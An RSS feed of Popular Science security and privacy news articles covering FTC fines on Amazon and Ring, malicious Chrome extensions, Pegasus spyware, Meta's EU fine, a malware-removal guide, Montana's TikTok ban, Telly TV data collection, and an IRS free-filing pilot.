Security | Popular Science https://www.popsci.com/category/security/ Awe-inspiring science reporting, technology news, and DIY projects. Skunks to space robots, primates to climates. That's Popular Science, 145 years strong. Thu, 01 Jun 2023 20:00:00 +0000 en-US hourly 1 https://wordpress.org/?v=6.1.1 https://www.popsci.com/uploads/2021/04/28/cropped-PSC3.png?auto=webp&width=32&height=32 Security | Popular Science https://www.popsci.com/category/security/ 32 32 An FTC one-two punch leaves Amazon and Ring with a $30 million fine https://www.popsci.com/technology/ftc-amazon-ring-fines/ Thu, 01 Jun 2023 20:00:00 +0000 https://www.popsci.com/?p=545190
Federal Trade Commission building exterior
The FTC is continuing to put the pressure on Amazon's business practices. Deposit Photos

The company and its home surveillance subsidiary are under fire for children's privacy law violations and mishandling data.

The post An FTC one-two punch leaves Amazon and Ring with a $30 million fine appeared first on Popular Science.

]]>
Federal Trade Commission building exterior
The FTC is continuing to put the pressure on Amazon's business practices. Deposit Photos

The Federal Trade Commission’s ongoing attempt to rein in Amazon entered a new phase this week, with the regulatory organization recommending both the company and its home surveillance system subsidiary Ring receive multimillion dollar fines in response to alleged monopolistic practices and data privacy violations.

According to an FTC statement released on Wednesday, Amazon disregarded children’s privacy laws by allegedly illegally retaining personal data and voice recordings via its Alexa software. Meanwhile, in a separate, same-day announcement, the commission claims Ring employees failed to stop hackers from gaining access to users’ cameras, while also illegally surveilling customers themselves.

Amazon relies on its Alexa service and Echo devices to collect massive amounts of consumer data, including geolocation data and voice recordings, which it then uses to both further train its algorithms as well as hone its customer profiles. Some of Amazon’s Alexa-enabled products marketed directly to children and their parents collect data and voice recordings, which the company can purportedly retain indefinitely unless parents specifically request the information be deleted.  According to the FTC, however, “even when a parent sought to delete that information … Amazon failed to delete transcripts of what kids said from all its databases.”

[Related: End-to-end encryption now available for most Ring devices.]

Regulators argued these privacy omissions are in direct violation of the Children’s Online Privacy Protection Act (COPPA) Rule. First established in 1998, the COPPA Rule requires websites and online services aimed at children under 13-years-old to notify parents about the information collected, as well as obtain their consent.

According to the complaint, Amazon claimed children’s voice recordings were retained to help Alexa respond to vocal commands, improve its speech recognition and processing abilities, and allow parents to review them. “Children’s speech patterns and accents differ from those of adults, so the unlawfully retained voice recordings provided Amazon with a valuable database for training the Alexa algorithm to understand children, benefitting its bottom line at the expense of children’s privacy,” argues the FTC.

“Amazon’s history of misleading parents, keeping children’s recordings indefinitely, and flouting parents’ deletion requests violated COPPA and sacrificed privacy for profits,” said Samuel Levine, Director of the FTC’s Bureau of Consumer Protection, in Wednesday’s announcement. “COPPA does not allow companies to keep children’s data forever for any reason, and certainly not to train their algorithms.”

[Related: Amazon’s new warehouse employee training exec used to manage private prisons.]

The FTC’s proposed order includes deleting all relevant data alongside a $25 million civil penalty. Additionally, Amazon would be prohibited from using customers’ (including children’s) voice information and geolocations upon consumers’ request. The company would also be compelled to delete inactive children’s Alexa accounts, prohibit them from misrepresenting privacy policies, as well as mandate the creation and implementation of a privacy program specifically concerning its usage of geolocation data.

Meanwhile, the FTC simultaneously issued charges against Amazon-owned Ring, claiming the smart home security company allowed “any employee or contractor” to access customers’ private videos, and failed to implement “basic privacy and security protections” against hackers. In one instance offered by the FTC, a Ring employee “viewed thousands” of videos belonging to female Ring camera owners set up in spaces such as bathrooms and bedrooms. Even after imposing restrictions on customer video access following the incident, the FTC alleges the company couldn’t determine how many other workers engaged in similar conduct “because Ring failed to implement basic measures to monitor and detect employees’ video access.”

[Related: Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks.]

The FTC’s proposed order against Ring would require the company to pay $5.8 million in fines to be directed towards consumer refunds. The company would also be compelled to delete any data, including facial information, amassed prior to 2018.

Amazon purchased Ring in 2018, and has since vastly expanded its footprint within the home surveillance industry. In that time, however, the company has found itself under fire on numerous occasions for providing video files to law enforcement entities without consumers’ knowledge, lax security, as well as promoting products via its much-criticized found footage reality TV show, Ring Nation.

The post An FTC one-two punch leaves Amazon and Ring with a $30 million fine appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
This PDF Chrome extension might contain malware https://www.popsci.com/technology/chrome-extension-malware-pdf-toolbox/ Thu, 01 Jun 2023 18:00:00 +0000 https://www.popsci.com/?p=545125
chrome browser icons
Growtika / Unsplash

The extension could be used to access every web page you currently have open in your browser.

The post This PDF Chrome extension might contain malware appeared first on Popular Science.

]]>
chrome browser icons
Growtika / Unsplash

An independent security researcher has found malicious code in 18 Chrome extensions currently available in the Chrome Web Store. Combined, the extensions have over 57 million active users. It’s yet more evidence that Chrome extensions need to be evaluated with a critical eye. 

Chrome extensions are apps built on top of Google Chrome that allow you to add extra features to your browser. The tasks that this customizable feature can do are wide-ranging, but some popular extensions can auto-fill your password, block ads, enable one-click access to your todo list, or change how a social media site looks. Unfortunately, because Chrome extensions are so powerful and can have a lot of control over your browsing experience, they are a popular target for hackers and other bad actors. 

Earlier this month, independent security researcher Wladimir Palant discovered code in a browser extension called PDF Toolbox that allows it to inject malicious JavaScript code into any website you visit. The extension purports to be a basic PDF processor that can do things like convert other documents to PDF, merge two PDFs into one, and download PDFs from open tabs. 

It’s that last feature that leaves PDF Toolbox open for bad intentions. Google requires extension developers to only use the minimum permissions necessary. In order to download PDFs from tabs that aren’t currently active, PDF Toolbox has to be able to access every web page you currently have open. Without this feature, it would not be able to pseudo-legitimately access your browser to the same extent.

While PDF Toolbox seemingly can do all the PDF tasks it claims to be able to, it also downloads and runs a JavaScript file from an external website which could contain code to do almost anything, including capture everything you type into your browser, redirect you to fake websites, and take control of what you see on the web. By making the malicious code resemble a legitimate API call, obfuscating it so that it’s hard to follow, and delaying the malicious call for 24 hours, PDF Toolbox has been able to avoid being removed from the Chrome Web Store by Google since it was last updated in January 2022. (It is still available there at the time of writing, despite Palant lodging a report about its malicious code.) 

Palant had no way of confirming what the malicious code in PDF Toolbox did when he first discovered it. However yesterday, he disclosed 17 more browser extensions that use the same trick to download and run a JavaScript file. These include Autoskip for Youtube, Crystal Ad block, Brisk VPN, Clipboard Helper, Maxi Refresher, Quick Translation, Easyview Reader view, Zoom Plus, Base Image Downloader, Clickish fun cursors, Maximum Color Changer for Youtube, Readl Reader mode, Image download center, Font Customizer, Easy Undo Closed Tabs, OneCleaner, and Repeat button, though it is likely that there are other infected extensions. These were only the ones that Palant found in a sample of approximately 1,000 extensions.

In addition to finding more affected extensions, Palant was able to confirm what the malicious code was doing (or at least had done in the past). The extensions were redirecting users’ Google searches to third-party search engines, likely in return for a small affiliate fee. By infecting millions of users, the developers could rake in a tidy amount of profit. 

Unfortunately, code injection is code injection. Just because the malicious JavaScript fairly harmlessly redirected Google searches to alternative search engines in the past, doesn’t mean that it does so today. “There are way more dangerous things one can do with the power to inject arbitrary JavaScript code into each and every website,” writes Palant.

And what kind of dangerous things are those? Well, the extensions could be collecting browser data, adding extra ads to every web page someone visits, or even recording online banking credentials and credit card numbers. Malicious JavaScript running unchecked in your web browser can be incredibly powerful. 

If you have one of the affected extensions installed on your computer, you should remove it now. It’s also a good idea to do a quick audit of all the other extensions you have installed to make sure that you are still using them, and that they all look to be legitimate. If you not, you should remove them too. 

Otherwise, treat this as a reminder to always be vigilant for potential malware. For more tips on how to fight it, check out our guide on removing malware from your computer.

The post This PDF Chrome extension might contain malware appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Big Tech’s latest AI doomsday warning might be more of the same hype https://www.popsci.com/technology/ai-warning-critics/ Wed, 31 May 2023 14:00:00 +0000 https://www.popsci.com/?p=544696
Critics say current harms of AI include amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption.
Critics say current harms of AI include amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption. Photo by Jaap Arriens/NurPhoto via Getty Images

On Tuesday, a group including AI's leading minds proclaimed that we are facing an 'extinction crisis.'

The post Big Tech’s latest AI doomsday warning might be more of the same hype appeared first on Popular Science.

]]>
Critics say current harms of AI include amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption.
Critics say current harms of AI include amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption. Photo by Jaap Arriens/NurPhoto via Getty Images

Over 350 AI researchers, ethicists, engineers, and company executives co-signed a 22-word, single sentence statement about artificial intelligence’s potential existential risks for humanity. Compiled by the nonprofit organization Center for AI Safety, a consortium including the “Godfather of AI,” Geoffrey Hinton, OpenAI CEO Sam Altman, and Microsoft Chief Technology Officer Kevin Scott agree that, “Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.”

The 22-word missive and its endorsements echo a similar, slightly lengthier joint letter released earlier this year calling for a six-month “moratorium” on research into developing AI more powerful than OpenAI’s GPT-4. Such a moratorium has yet to be implemented.

[Related: There’s a glaring issue with the AI moratorium letter.]

Speaking with The New York Times on Tuesday, Center for AI Safety’s executive director Dan Hendrycks described the open letter as a “coming out” for some industry leaders. “There’s a very common misconception, even in the AI community, that there only are a handful of doomers. But, in fact, many people privately would express concerns about these things,” added Hendrycks.

But critics remain wary of both the motivations behind such public statements, as well as their feasibility.

“Don’t be fooled: it’s self-serving hype disguised as raising the alarm,” says Dylan Baker, a research engineer at the Distributed AI Research Institute (DAIR), an organization promoting ethical AI development. Speaking with PopSci, Baker went on to argue that the current discussions regarding hypothetical existential risks distract the public and regulators from “the concrete harms of AI today.” Such harms include “amplifying algorithmic harm, profiting from exploited labor and stolen data, and fueling climate collapse with resource consumption.”

A separate response first published by DAIR following March’s open letter and re-upped on Tuesday, the group argues, “The harms from so-called AI are real and present and follow from the acts of people and corporations deploying automated systems. Regulatory efforts should focus on transparency, accountability and preventing exploitative labor practices.”

Hendrycks, however, believes that “just as it would be reckless to exclusively prioritize present harms, it would also be reckless to ignore them as well.” Hendrycks likened the moment to when atomic scientists warned the world about the technologies they created before quoting J. Robert Oppenheimer, “We knew the world would not be the same.”

[Related: OpenAI’s newest ChatGPT update can still spread conspiracy theories.]

“They are essentially saying ‘hold me back!’ media and tech theorist Douglas Rushkoff wrote in an essay published on Tuesday. He added that a combination of “hype, ill-will, marketing, and paranoia” is fueling AI coverage, and hiding the technology’s very real, demonstrable issues while companies attempt to consolidate their holds on the industry. “It’s just a form of bluffing,” he wrote, “Sorry, but I’m just not buying it.

In a separate email to PopSci, Rushkoff summarized his thoughts, “If I had to make a quote proportionately short to their proclamation, I’d just say: They mean well. Most of them.”

The post Big Tech’s latest AI doomsday warning might be more of the same hype appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A notorious spyware program was deployed during war for the first time https://www.popsci.com/technology/pegasus-spyware-war/ Thu, 25 May 2023 18:00:00 +0000 https://www.popsci.com/?p=543624
Building rubble from missile strike
Nov 05, 2020: Civilian building hit by Azerbaijani armed forces during a missile strike on the villages near Stepanakert. Deposit Photos

An Israeli tech company's Pegasus spyware was detected on the phones of Armenian journalists and other civilians critical of Azerbaijan's incursion.

The post A notorious spyware program was deployed during war for the first time appeared first on Popular Science.

]]>
Building rubble from missile strike
Nov 05, 2020: Civilian building hit by Azerbaijani armed forces during a missile strike on the villages near Stepanakert. Deposit Photos

The notorious Pegasus software exploit developed by the Israeli tech company NSO Group has allegedly been used for the first time as a weapon against civilians in an international conflict. According to a new report, the software is being used to spy on experts, journalists, and others critical of Azerbaijan’s incursion into the territories of Nagorno-Karabakh in Armenia.

Reports of potentially the first documented case of a sovereign state utilizing the commercial spyware during a cross-border conflict comes courtesy of the digital rights group, Access Now, in collaboration with CyberHUB-AM, the University of Toronto’s Citizen Lab at the Munk School of Global Affairs, Amnesty International’s Security Lab, and independent mobile security researcher, Ruben Muradyan.

[Related: You need to protect yourself from zero-click attacks.]

According to the research team’s findings published on Thursday, at least 12 individuals’ Apple devices were targets of the spyware between October 2020 and December 2022, including journalists, activists, a government worker, and Armenia’s “human rights ombudsperson.” Once infected with the Pegasus software, third-parties can access text messages, emails, and photos, as well as activate microphones and cameras to secretly record communications.

Although Access Now and its partners cannot conclusively link these attacks to a “specific [sic] governmental actor,” the “Armenia spyware victims’ work and the timing of the targeting strongly suggest that the conflict was the reason for the targeting,” they write in the report. As TechCrunch also noted on Thursday, The Pegasus Project, monitoring the spyware’s international usage, previously determined that Azerbaijan is one of NSO Group’s customers.

[Related: Why you need to update your Apple products’ software ASAP.]

Based in Israel, NSO Group claims to provide “best-in-class technology to help government agencies detect and prevent terrorism and crime.” The group has long faced intense international criticism, blacklisting, and lawsuits for its role in facilitating state actors with invasive surveillance tools. Pegasus is perhaps its most infamous product, and offers what is known as a “zero-click” hack. In 2021, PopSci explained:

Unlike the type of viruses you might have seen in movies, this one doesn’t spread. It is targeted at a single phone number or device, because it is sold by a for-profit company with no incentive to make the virus easily spreadable. Less sophisticated versions of Pegasus may have required users to do something to compromise their devices, like click on a link sent to them from an unknown number. 

In September 2021, the University of Toronto’s Citizen Lab discovered NSO Group’s Pegasus spyware on a Saudi Arabian activists’ iPhones that may have proved instrumental in the assassination of US-based Saudi critic Jamal Khashoggi, quickly prompting Apple to release a security patch to its over 1.65 billion users. Later that year the US Department of Commerce added NSO Group to its “Entity List for Malicious Cyber Activities.”

“Helping attack those already experiencing violence is a despicable act, even for a company like NSO Group,” Access Now’s senior humanitarian officer, Giulio Coppi, said in a statement. “Inserting harmful spyware technology into the Armenia-Azerbaijan conflict shows a complete disregard for safety and welfare, and truly unmasks how depraved priorities can be. People must come before profit—it’s time to disarm spyware globally.”

The post A notorious spyware program was deployed during war for the first time appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Meta fined record $1.3 billion for not meeting EU data privacy standards https://www.popsci.com/technology/meta-facebook-record-fine/ Mon, 22 May 2023 16:00:00 +0000 https://www.popsci.com/?p=542612
Facebook webpage showing unavailable account error message.
Ireland’s DPC has determined Facebook’s data transfer protocols to the US do not “address the risks to the fundamental rights and freedoms” of EU residents. Deposit Photos

Despite the massive penalty, little may change so long as US data law remains lax.

The post Meta fined record $1.3 billion for not meeting EU data privacy standards appeared first on Popular Science.

]]>
Facebook webpage showing unavailable account error message.
Ireland’s DPC has determined Facebook’s data transfer protocols to the US do not “address the risks to the fundamental rights and freedoms” of EU residents. Deposit Photos

Ireland’s Data Protection Commission (DPC) slapped Meta with a record-shattering $1.3 billion (€1.2 billion) fine Monday alongside an order to cease transferring EU users’ Facebook data to US servers. But despite the latest massive penalty, some legal experts warn little will likely change within Meta’s overall approach to data privacy as long as US digital protections remain lax.

The fine caps a saga initiated nearly decade ago thanks to whistleblower Edward Snowden’s damning reveal of American digital mass surveillance programs. Since then, data privacy law within the EU changed dramatically following the 2016 passage of its General Data Protection Regulations (GDPR). After years of legal back-and-forth in the EU, Ireland’s DPC has determined Facebook’s data transfer protocols to the US do not “address the risks to the fundamental rights and freedoms” of EU residents. In particular, the courts determined EU citizens’ information could be susceptible to US surveillance program scrapes, and thus violate the GDPR.

[Related: A massive data leak just cost Meta $275 million.]

User data underpins a massive percentage of revenue for tech companies like Meta, as it is employed to build highly detailed, targeted consumer profiles for advertising. Because of this, Meta has fought tooth-and-nail to maintain its ability to transfer global user data back to the US. In a statement attributed to Meta’s President of Global Affairs Nick Clegg and Chief Legal Officer Jennifer Newstead, the company plans to immediately pursue a legal stay “given the harm that these orders would cause, including to the millions of people who use Facebook every day.” The Meta representatives also stated “no immediate disruption” would occur for European Facebook users.

As The Verge notes, there are a number of stipulations even if Meta’s attempt at a legal stay falls apart. Right at the outset, the DPC’s decision pertains only to Facebook, and not Meta’s other platforms such as WhatsApp and Instagram. Next, Meta has a five-month grace period to cease future data transfers alongside a six-month deadline to purge its current EU data held within the US. Finally, the EU and the US are in the midst of negotiations regarding a new data transfer deal that could finalize as soon as October.

[Related: EU fines Meta for forcing users to accept personalized ads.]

Regardless, even with the record-breaking fine, some policy experts are skeptical of the penalty’s influence on Meta’s data policy. Over the weekend, a senior fellow at the Irish Council for Civil Liberties told The Guardian that, “A billion-euro parking ticket is of no consequence to a company that earns many more billions by parking illegally.” Although some states including California, Utah, and Colorado have passed their own privacy laws, comprehensive US protections remain stalled at the federal level. 

The post Meta fined record $1.3 billion for not meeting EU data privacy standards appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
How to remove malware from your suffering computer https://www.popsci.com/remove-malware-from-computer/ Sat, 28 Aug 2021 19:00:00 +0000 https://www.popsci.com/uncategorized/remove-malware-from-computer/
A person sitting in front of a laptop that has a skull and crossbones in green code on the screen, indicating that it may have been infected with malware that they'll now need to remove.
All is not lost if you've been hit by malware. Alejandro Escamilla / Unsplash; Geralt / Pixabay

Getting rid of malicious software isn't as difficult as it may seem.

The post How to remove malware from your suffering computer appeared first on Popular Science.

]]>
A person sitting in front of a laptop that has a skull and crossbones in green code on the screen, indicating that it may have been infected with malware that they'll now need to remove.
All is not lost if you've been hit by malware. Alejandro Escamilla / Unsplash; Geralt / Pixabay

Disaster has struck—a nasty piece of malware has taken root on your computer, and you need to remove it. Viruses can cause serious damage, but you might be able to get your computer back on its feet without too much difficulty, thanks to an array of helpful tools.

We’re using the term malware to refer to all kinds of malicious programs, whether they’re viruses, ransomware, adware, or something else. Each of these threats has its own definition, but the terms are often used interchangeably and can mean different things to different people. So for simplicity’s sake, when we say malware, we mean everything you don’t want on your computer, from a virus that tries to delete your files to an adware program that’s tracking your web browsing.

With so many types of malware and so many different system setups out there, we can’t cover every scenario. Still, we can give you some general malware removal pointers that should help you get the assistance you need.

First, identify the problem

When malware hits, you sometimes get a threatening error message—but sometimes you don’t. So keep an eye out for red flags, such as an uncharacteristically slow computer, a web browser inundated by endless pop-ups, and applications that just keep crashing.

Most machines have some kind of antivirus security protection, even if it’s just the Windows Defender tool built into Windows 10 or 11. Extra security software isn’t as essential on macOS—its integrated defenses are very effective—but that doesn’t mean a clever bit of malware can’t get access.

Windows Defender, an antivirus program that will help you remove malware from Windows computers.
Windows Defender offers competent basic malware protection for Windows 10 and 11. David Nield for Popular Science

If you do have a security tool installed, make sure you keep it up to date. Then, when you suspect you’ve been hit, run a thorough system scan—the app itself should have instructions for how to do so. This is always the first step in weeding out unwanted programs.

[Related: How to make sure no one is spying on your computer]

You might find that your installed security software spots the problem and effectively removes the malware it on its own. In that case, you can get on with watching Netflix or checking your email without further interference. Unfortunately, if your antivirus software of choice doesn’t see anything wrong or can’t deal with what it’s found, you have more work to do.

Deal with specific threats

If your computer is displaying specific symptoms—such as a message with a particular error code or a threatening ransomware alert—run a web search to get more information. And if you suspect your main machine is infected and potentially causing problems with your web browser, you should search for answers on your phone or another computer.

Telling you to search online for help may seem like we’re trying to pass the buck, but this is often the best way to deal with the biggest and newest threats. To remove malware that has overwhelmed your computer’s built-in virus protections, you’ll probably need to follow specific instructions. Otherwise, you could inadvertently make the situation worse.

As soon as new threats are identified, security firms are quick to publish fixes and tools. This means it’s important to stay in touch with the latest tech news as it happens. If your existing antivirus program is coming up blank, check online to see if companies have released bespoke repair tools that you can use to deal with whatever problem you’re having.

Finally, based on what your research and antivirus scans tell you, consider disconnecting your computer from the internet to stop any bugs from spreading, or shutting down your machine completely to protect against file damage.

Try on-demand tools that will remove tricky malware

At this point, you’ve scanned your computer for malware using your normal security software and done some research into what might be happening. If you’ve still got a problem or your searches are coming up blank, you can find on-demand malware scanners online. These programs don’t require much in the way of installation, and they can act as useful “second opinions” to your existing anti-malware apps.

Tools such as Microsoft Safety Scanner, Spybot Search and Destroy, Bitdefender Virus Scanner (also for macOS), Kaspersky Security Scan, Avira PC Cleaner, Malwarebytes, and others can parachute onto your system for extra support. There, they’ll troubleshoot problems and give your existing security tools a helping hand.

Microsoft Safety Scanner, an antivirus program that will help you remove malware.
On-demand scanners, like Microsoft Safety Scanner, will take another pass at your applications and files and likely get rid of any malware that’s particularly troublesome. David Nield for Popular Science

Another reason to use extra software is that whatever nasty code has taken root on your system might be stopping your regular security tools from working properly. It could even be blocking your access to the web. In the latter case, you should use another computer to download one of these on-demand programs onto a USB stick, then transfer the software over to the machine you’re having problems with.

[Related: How to safely find out what’s on a mysterious USB device]

All of the apps listed above will do a thorough job of scanning your computer and removing any malware they find. To make extra sure, you can always run scans from a couple of different tools. If your computer has been infected, these apps will most likely be able to spot the problem and deal with it, or at least give you further instructions.

Once your existing security tools and an on-demand scanner or two have given your system a clean bill of health, you’re probably (though not definitely) in the clear. That means that any continued errors or crashes could be due to other factors—anything from a badly installed update to a failing hard drive.

Delete apps and consider resetting your system

Once you’ve exhausted the security-software solutions, you still have a couple of other options. One possibility: Hunt through your installed apps and browser extensions and uninstall any you don’t recognize or need. The problem with this method is that you could accidentally delete a piece of software that turns out to be vital. So, if you go down this route, make sure to do extra research online to figure out whether or not the apps and add-ons you’re looking at seem trustworthy.

A more drastic—but extremely effective—course of action is to wipe your computer, reinstall your operating system, and start again from scratch. Although this will delete all your personal files, it should hopefully remove malware and other unwanted programs at the same time. Before you take this step, make sure all your important files and folders are backed up somewhere else, and ensure that you’ll be able to download all your applications again.

The options for reinstalling Windows 10.
Resetting and reinstalling your operating system is always an option, but it could erase your files along with any malware if you don’t prepare properly. David Nield for Popular Science

Reinstalling the operating system and getting your computer back to its factory condition is actually much easier than it used to be. We have our own guide for resetting Windows 10 and 11, and Apple has instructions for macOS. If you need more pointers, you can find plenty of extra information online.

That’s it! Through a combination of bespoke removal methods, existing security software, on-demand scanners, and (if necessary) a system wipe, you should now have effectively removed whatever malware had taken root on your system. At this point, if you’re still struggling, it’s time to call in the experts. IT repair specialists in your area may be able to lend a hand.

How to prevent future problems

Proactively protecting your computer against malware is a whole ‘nother story, but here’s a quick run-down of the basics. Be careful with the links and attachments you open and the files you allow on your computer. Remember that most viruses and malware will find their way to your computer through your email or web browser, so make sure you use some common sense and are cautious about what you click on and download. You should also take care to keep your online accounts safe and secure.

Next, install a solid security tool you can trust. For Windows 10 and 11, the built-in Windows Defender program is a competent antivirus tool even if you don’t add anything else. That said, you can opt to bolster your machine’s defenses by paying for extra software from the likes of Norton, Avast, and many others. While the number of shady programs targeting Apple computers is on the rise, they’re still more secure than Windows machines. The general consensus is that macOS is mostly safe from harm, provided you only install programs through the App Store and apply plenty of common sense. That means you should avoid following shady links or plugging in strange USB drives you’ve found lying in the street.

Finally, make sure your software is always patched and up to date. Most browsers and operating systems will update automatically in the background, but you can check for pending patches on Windows 10 by opening Settings and clicking Update & security (on Windows 11 it’s Settings > Windows Update). If you have a macOS computer, just open up the App Store and switch to the Updates tab to see if anything is available that you haven’t downloaded.

It’s difficult to give a prescriptive setup for every system and every user, but you should always remember that 100 percent effective protection is hard to guarantee. Always stay on your guard.

This story has been updated. It was originally published on May 17, 2017.

The post How to remove malware from your suffering computer appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Montana is the first state to ‘ban’ TikTok, but it’s complicated https://www.popsci.com/technology/montana-tiktok-ban-law/ Thu, 18 May 2023 15:00:00 +0000 https://www.popsci.com/?p=541964
TikTok brand logo on the screen of Apple iPhone on top of laptop keyboard
Critics argue a ban on TikTok is a violation of the First Amendment. Deposit Photos

The law is scheduled to go into effect next year, although it remains unclear how it could actually be enforced.

The post Montana is the first state to ‘ban’ TikTok, but it’s complicated appeared first on Popular Science.

]]>
TikTok brand logo on the screen of Apple iPhone on top of laptop keyboard
Critics argue a ban on TikTok is a violation of the First Amendment. Deposit Photos

Montana Governor Greg Gianforte signed a bill into law on Wednesday banning TikTok within the entire state, all-but-ensuring a legal, political, and sheer logistical battle over the popular social media platform’s usage and accessibility.

In a tweet on Wednesday, Gianforte claimed the new law is an effort to “protect Montanans’ personal and private data from the Chinese Communist Party.” Critics and security experts, however, argue the app’s blacklisting infringes on residents’ right to free speech, and would do little to actually guard individuals’ private data.

“This unconstitutional ban undermines the free speech and association of Montana TikTok users and intrudes on TikTok’s interest in disseminating its users’ videos,” the digital rights advocacy organization Electronic Frontier Foundation argued in a statement posted to Twitter,  calling the new law a “blatant violation of the First Amendment.”

[Related: Why some US lawmakers want to ban TikTok.]

According to the EFF and other advocacy groups, Montana’s TikTok ban won’t actually protect residents’ from companies and bad actors who can still scrape and subsequently monetize their private data. Instead, advocates repeated their urge for legislators to pass comprehensive data privacy laws akin to the European Union’s General Data Protection Regulations. Similar laws have passed in states like California, Colorado, and Utah, but continue to stall at the federal level.

“We want to reassure Montanans that they can continue using TikTok to express themselves, earn a living and find community as we continue working to defend the rights of our users inside and outside of Montana,”TikTok spokesperson Brooke Oberwetter stated on Wednesday.

Montana’s new law is primarily focused on TikTok’s accessibility via app stores from tech providers like Apple and Google, which are directed to block all downloads of the social media platform once the ban goes into effect at the beginning of 2024. Montanans are not subject to the $10,000 per day fine if they still access TikTok—rather, the penalty is levied at companies such as Google, Apple, and TikTok’s owner, ByteDance.

[Related: The best VPNs of 2023.]

That said, there is no clear or legal way to force Montanans to delete the app if it is already downloaded to their phones. Likewise, proxy services such as VPNs hypothetically could easily skirt the ban. As The Guardian noted on Thursday, the ability for Montana to actually enforce a wholesale ban on the app is ostensibly impossible, barring the state following censorship tactics used by nations such as China.

“With this ban, Governor Gianforte and the Montana legislature have trampled on the free speech of hundreds of thousands of Montanans who use the app to express themselves, gather information, and run their small business in the name of anti-Chinese sentiment,” Keegan Medrano, policy director at the ACLU of Montana, said in a statement. “We will never trade our First Amendment rights for cheap political points.”

The post Montana is the first state to ‘ban’ TikTok, but it’s complicated appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Read the fine print before signing up for a free Telly smart TV https://www.popsci.com/technology/telly-free-smart-tv/ Wed, 17 May 2023 16:00:00 +0000 https://www.popsci.com/?p=541666
Telly dual-screen smart TV mounted on wall
Telly will give you a free smart TV in exchange for pop-up ads and quite a bit of your personal data. Telly

Your personal data is the price you'll pay for the double-screened television.

The post Read the fine print before signing up for a free Telly smart TV appeared first on Popular Science.

]]>
Telly dual-screen smart TV mounted on wall
Telly will give you a free smart TV in exchange for pop-up ads and quite a bit of your personal data. Telly

Nothing in this life is free, especially a “free” 55-inch television. On Monday, a new startup called Telly announced plans to provide half-a-million smart TVs to consumers free-of-charge. But there’s a catch—underneath the sizable 4K HDR primary screen and accompanying five-driver soundbar is a second, smaller screen meant to constantly display advertisements alongside other widgets like stock prices and weather forecasts. The tradeoff for a constant stream of Pizza Hut offers and car insurance deals, therefore, is a technically commercial-free streaming experience. Basically, it swaps out commercial breaks for a steady montage of pop-up ads.

Whether or not this kind of entertainment experience is for you is a matter of personal preference, but be forewarned: Even after agreeing to a constant barrage of commercials, Telly’s “free” televisions make sure they pay for themselves through what appears to be an extremely lax, potentially litigious privacy policy.

[Related: FTC sues data broker for selling information, including abortion clinic visits.]

As first highlighted by journalist Shoshana Wodinsky and subsequently boosted by TechCrunch on Tuesday, Telly’s original privacy fine print apparently was a typo-laden draft featuring editorial comments asking “Do wehave [sic] to say we will delete the information or is there another way around…,” discarding children’s personal data.

According to a statement provided to TechCrunch from Telly’s chief strategy officer Dallas Lawrence, the questions within the concerning, since-revised policy draft “appear a bit out of context,” and there’s a perfectly logical explanation to it:

“The team was unclear about how much time we had to delete any data we may inadvertently capture on children under 13,” wrote Lawrence, who added, “The term ‘quickly as possible’ that was included in the draft language seemed vague and undetermined and needing [sic] further clarification from a technical perspective.”

[Related: This app helped police plan raids. Hackers just made the data public.]

But even without the troubling wording, Telly’s privacy policy also discloses it collects such information as names, email addresses, phone numbers, ages, genders, ethnicities, and precise geolocations. At one point, the policy stated it may collect data pertaining to one’s “sex life or sexual orientation,” although TechCrunch notes this stipulation has since been “quietly removed” from its privacy policy.

User data troves are often essential to tech companies’ financials, as they can be sold to any number of third-parties for lucrative sums of money. Most often, this information is used to build extremely detailed consumer profiles to customize ad experiences, but there are numerous instances of data caches being provided to law enforcement agencies without users’ knowledge, alongside various hacker groups and bad actors regularly obtaining the personal information.

Telly is still taking reservations for its “free” smart TVs, but as the old adage goes: Buyer beware. And even when you’re not technically “buying” it, you’re certainly paying for it.

The post Read the fine print before signing up for a free Telly smart TV appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A free IRS e-filing tax service could start rolling out next year https://www.popsci.com/technology/irs-free-tax-file/ Tue, 16 May 2023 16:00:00 +0000 https://www.popsci.com/?p=541377
Close up of female hand using calculator atop tax forms.
The IRS may test a new free filing system in January 2024. Deposit Photos

Free tax filing for everyone in the US could be a step closer to reality.

The post A free IRS e-filing tax service could start rolling out next year appeared first on Popular Science.

]]>
Close up of female hand using calculator atop tax forms.
The IRS may test a new free filing system in January 2024. Deposit Photos

Rumors of a free national tax e-filing service have surfaced repeatedly over the past couple years, and it sounds like the US could be one step closer to making it a reality. As The Washington Post first reported on Monday, the IRS plans to test a digital tax filing prototype with a small group of Americans at the onset of the 2024 tax season—but just how much of your biometric data is needed to use the service remains to be seen.

Although the IRS offers a Free File system for people below a certain income level (roughly 70 percent of the population), the Government Accountability Office estimates less than three percent of US tax filers actually utilize the service. The vast majority of Americans instead rely on third-party filing programs, either in the form of online services like Intuit TurboTax and H&R Block, or via third-party CPAs. The $11 billion private tax filing industry has come under intense scrutiny and subsequent litigation in recent years for allegedly misleading consumers away from free filing options to premium services. Last November, an investigation into multiple major third-party tax filing services’ data privacy policies revealed the companies previously provided sensitive personal data to Facebook via its Meta Pixel tracking code.

[Related: Major tax-filing sites routinely shared users’ financial info with Facebook.]

According to The Washington Post’s interviews with anonymous sources familiar with the situation, the IRS is developing the program alongside the White House’s technology consulting agency, the US Digital Service. A dedicated universal free filing portal would add the US to the list of nations that already provide similar options, including Australia, Chile, and Estonia.

